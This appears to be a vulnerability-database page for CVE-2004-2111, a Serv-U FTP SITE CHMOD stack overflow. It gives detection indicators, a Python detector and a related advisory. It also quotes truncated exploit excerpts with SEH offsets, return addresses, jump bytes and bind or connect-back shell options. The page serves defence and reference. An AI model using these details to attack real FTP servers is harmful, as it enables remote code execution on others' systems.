CVE-2004-2111
Published 2004-12-31
Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.
Priority P260 · high · 8.5 (CVSS 2.0), vector AV:N/AC:M/Au:S/C:C/I:C/A:C
EXPLOIT · EPSS 86.87% (99.7th percentile)
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | serv-u_file_server | <= 4.1.0.3 | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
Detection & IOCs (extracted from sources)
Byte patterns:
- \xeb\xc9\x41\x41
- W00T
- \x41\x41\xEB\x04
- \xeb\x06\x90\x90\xd6\x19\x02\x75
- \xeb\x06\xeb\x06
Detection notes:
- Detect oversized SITE CHMOD FTP commands: a SITE CHMOD command with a filename argument exceeding ~400 bytes is a strong indicator of exploitation attempts against CVE-2004-2111.
- Match FTP banner for vulnerable versions: Serv-U FTP Server v3.x or v4.0/v4.1 indicates a vulnerable target.
- Detect egghunter tag 'W00T' in FTP SITE CHMOD payloads as a Metasploit-specific exploit indicator.
- Flag FTP sessions where SITE CHMOD is followed by a payload containing SEH overwrite patterns (e.g., short JMP opcodes \xeb\x06 or \xeb\xc9 followed by return addresses) within the filename argument.
- Monitor for outbound connections to unexpected ports (e.g., 28876 or attacker-controlled ports) from the Serv-U FTP server process after a SITE CHMOD command, indicating successful shell binding.
- Exploitation requires valid FTP credentials and a writable directory; alert on authenticated FTP sessions issuing SITE CHMOD with abnormally long filenames (>400 bytes).
- Detect the exploit probe sequence: SITE CHMOD 477 with a filename containing \xff\xff bytes used to fingerprint the server version before the actual overflow.
- Exploitation leaves the Serv-U FTP service in a non-functional (crashed) state after a successful attack, which can serve as a post-exploitation indicator.
- The SEH overwrite offset differs between Serv-U versions: offset 0x193 for v3.0.0.20–v4.1.0.11 and 0x133 for v3.0.0.16–v3.0.0.19; detection rules should account for variable payload offsets (~394–400 bytes) across targets.
- The Metasploit module bad characters list (\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e) defines bytes that will NOT appear in the exploit payload, which can inform byte-pattern exclusions in detection signatures.
- The exploit targets Windows 2000 and Windows XP only; return addresses are DLL-specific (WS2HELP.DLL, libeay32.dll, ssleay32.dll) and vary by OS version and service pack.
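The indicators listed above can be checked on the FTP control channel with a small detector. This is an added example, not code from any of the sources indexed on this page; the function names and the sample session are constructed for illustration, and the sample uses filler bytes rather than a working payload.

```python
import re

# Threshold and byte patterns come from the detection notes above.
MAX_FILENAME = 400                      # filename arguments longer than this are suspicious
SHORT_JMPS = (b"\xeb\x06", b"\xeb\xc9", b"\xeb\x04")   # short JMP opcodes listed as IOCs
EGG_TAG = b"W00T"                       # egghunter tag noted for the Metasploit module
SITE_CHMOD = re.compile(rb"^SITE\s+CHMOD\s+(\S+)\s(.*)$", re.I | re.S)


def inspect_command(line: bytes) -> list[str]:
    """Return the indicator names raised by one FTP control-channel line."""
    m = SITE_CHMOD.match(line.rstrip(b"\r\n"))
    if not m:
        return []                       # not a SITE CHMOD command with a filename
    mode, filename = m.group(1), m.group(2)
    hits = []
    if len(filename) > MAX_FILENAME:
        hits.append("oversized-filename")
    if EGG_TAG in filename:
        hits.append("egghunter-tag")
    if any(jmp in filename for jmp in SHORT_JMPS):
        hits.append("short-jmp-bytes")  # weak on its own; strongest alongside oversize
    if mode == b"477" and b"\xff\xff" in filename:
        hits.append("version-probe")
    return hits


def scan_session(lines: list[bytes]) -> dict[int, list[str]]:
    """Map line index to indicators for every line that raised at least one."""
    return {i: hits for i, line in enumerate(lines) if (hits := inspect_command(line))}


# Constructed sample session (filler bytes only, not a working payload).
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"SITE CHMOD 644 report.txt\r\n",
    b"SITE CHMOD 477 " + b"\xff\xff" + b"probe\r\n",
    b"SITE CHMOD 0666 " + b"B" * 450 + b"\r\n",
    b"SITE CHMOD 0666 " + b"B" * 390 + EGG_TAG + b"\xeb\x06" + b"B" * 20 + b"\r\n",
]

if __name__ == "__main__":
    for idx, hits in scan_session(SAMPLE_SESSION).items():
        print(idx, ", ".join(hits))
```

Matching on raw bytes rather than decoded text matters here, because the patterns of interest are non-ASCII and would be lost or altered by a lossy decode in the logging path.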
GHSA
GHSA-r5vj-79v6-4xr3
ghsa_unreviewed·2022-04-29·CVE-2004-2111 [HIGH] CWE-119
Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.
GHSA
GHSA-23w8-jcvm-j4jg
ghsa_unreviewed·2022-04-29·CVSS 8.5·CVE-2004-2533 [HIGH] CWE-20
Serv-U FTP Server 4.1 (possibly 4.0) allows remote attackers to cause a denial of service (application crash) via a SITE CHMOD command with a "\\...\" followed by a short string, causing partial memory corruption, a different vulnerability than CVE-2004-2111.
No detection rules found.
Exploit-DB
RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)
exploitdb·2011-12-02·CVE-2004-2111
RhinoSoft Serv-U FTPd Server 'Serv-U FTP Server %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.
You must have valid credentials to trigger this vulnerability. Exploitation
also leaves the service in a non-functional state.
},
'Author' => 'thelightcosine ',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2111'],
[ 'BID', '9483'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-4 EN', {
'Ret' => 0x750212bc, #WS2HELP.DLL
'Offset' => 396 } ],
[ 'Windows XP SP0-1 EN', {
'Ret' => 0x71aa388f,
Exploit-DB
RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow
exploitdb·2004-01-30·CVE-2004-2111
---
#include
#include
#include
#include
#define exploit_length 511
#define NOP 'A'
#define SEH_handler_offset 400
char* SEH_handler = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
char* shellcode =
Exploit-DB
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
exploitdb·2004-01-27·CVE-2004-2111
---
/*
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : [email protected]
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq [email protected] ***
* : *** You need a valid account and a writable directory. ***
* Compile : cl Servu.c
* Usage : Servu [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*/
#include
#include
#include
#include
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shell
Exploit-DB
RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)
exploitdb·2004-01-25·CVE-2004-2111
---
// source: https://www.securityfocus.com/bid/9483/info
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existent file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible.
/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by [email protected]
* exp coded by [email protected]
* Jan 25 2004
*/
/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/
#include
#include
#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define
Exploit-DB
RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1)
exploitdb·2004-01-24·CVE-2004-2111
---
// source: https://www.securityfocus.com/bid/9483/info
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existent file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible.
/*
software: Serv-U 4.1.0.0
vendor: RhinoSoft, http://www.serv-u.com/
credits: kkqq , http://www.0x557.org/release/servu.txt
greets: rosecurity team, int3liban
notes: should work on any NT, reverse bindshell, terminates the process
author: mandragore, [email protected]
*/
#include
#include
#include
#include
#includ
Metasploit
Serv-U FTP Server Buffer Overflow
metasploit
This module exploits a stack buffer overflow in the site chmod command in versions of Serv-U FTP Server prior to 4.2. You must have valid credentials to trigger this vulnerability. Exploitation also leaves the service in a non-functional state.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/bugtraq/2004-01/0249.html
- http://marc.info/?l=bugtraq&m=107513654005840&w=2
- http://securitytracker.com/id?1008841
- http://www.securityfocus.com/bid/9483
- http://www.securityfocus.com/bid/9675
- https://exchange.xforce.ibmcloud.com/vulnerabilities/14931
Published: 2004-12-31